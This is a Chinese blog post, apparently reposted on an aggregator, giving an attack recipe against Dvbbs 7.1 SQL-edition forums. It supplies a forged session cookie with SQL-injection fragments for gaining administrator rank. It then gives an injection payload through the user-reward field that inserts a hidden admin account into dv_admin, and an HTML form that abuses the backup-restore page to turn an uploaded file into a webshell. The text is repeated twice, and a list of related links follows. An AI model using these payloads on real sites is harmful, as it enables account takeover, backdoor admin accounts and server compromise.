最新dvbbs 7.1sql提权得shell
2007-01-16 00:00
399 查看
dvbbs 7.1跳过死循环,按linzi的方法只能是有一个管理权限,而只是新手上路的等级
如果是sql版,就不好暴库,事实上好像只需要抓取SESSION即可,不要登陆任何用户。
欺骗时不要关闭假死的那个ie
这个是死循环的SESSION:
ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ
加入或替换到可以欺骗的浏览器的cookie栏。
List=list5+and+1%3D2=1&list5+and+1%3D1=1&list1+and+1%3D2=1&list1+and+1%3D1=1&list3+and+1%3D2=1&list3+and+1%3D1=1; ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ
然后点任何板块
就能发现,你欺骗的用户和等级都是管理员了。
后台管理员可以通过用户奖励那里加入
test','127.0.0.1',5) ;insert into dv_admin (username,[password],flag,adduser) values ('jinsdb','4ac646c9e65a1769','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','jinsdb');--
dvbbs7.1 sql 后台得shell
<form action="http://127.0.0.1/bbs/admin/data.asp?act...t=Restore" method="post">
<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>
<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p>
</form>
好像7.1的usercookies只是个幌子
根本没必要
去掉了也一样可以使用
搞笑
如果是sql版,就不好暴库,事实上好像只需要抓取SESSION即可,不要登陆任何用户。
欺骗时不要关闭假死的那个ie
这个是死循环的SESSION:
ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ
加入或替换到可以欺骗的浏览器的cookie栏。
List=list5+and+1%3D2=1&list5+and+1%3D1=1&list1+and+1%3D2=1&list1+and+1%3D1=1&list3+and+1%3D2=1&list3+and+1%3D1=1; ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ
然后点任何板块
就能发现,你欺骗的用户和等级都是管理员了。
后台管理员可以通过用户奖励那里加入
test','127.0.0.1',5) ;insert into dv_admin (username,[password],flag,adduser) values ('jinsdb','4ac646c9e65a1769','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','jinsdb');--
dvbbs7.1 sql 后台得shell
<form action="http://127.0.0.1/bbs/admin/data.asp?act...t=Restore" method="post">
<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>
<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p>
</form>
好像7.1的usercookies只是个幌子
根本没必要
去掉了也一样可以使用
搞笑
相关文章推荐
- Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范
- DVBBS7.1 SQL版 跨库漏洞
- 对dvbbs7.1 sp1最新savepost.asp漏洞的研究和利用
- dvbbs7.1 sql升级笔记
- 2017年最新的全国省市sql数据
- 无wscript.shell组件webshell提权的经验
- 在pl/sql中调用shell命令的4种方法
- spark cluster 下 spark-shell/spark-spark提交wordcount sparksql Demo
- SQL Server自动化运维系列——批量执行SQL脚本(Power Shell)
- Shell脚本中执行sql语句操作mysql的5种方法
- shell敏感词文件批量生成sql
- spark-shell 调hive sql的例子
- mysql最新通用二进制分发版本5.7.16自动安装shell脚本
- shell调用sqlplus(sftp)并传入命令
- Java乔晓松-2013最新sql语句面试题1
- Java乔晓松-2013最新sql语句面试题1
- 用shell批量导入多个sql文件到mysql
- 分页sql写法【只用最新的】
- Windows 平台运行spark-shell 报"java.lang.NullPointerException, not found: value sqlContext" error 解决办法
- 一条语句简单解决“每个Y的最新X”的经典sql语句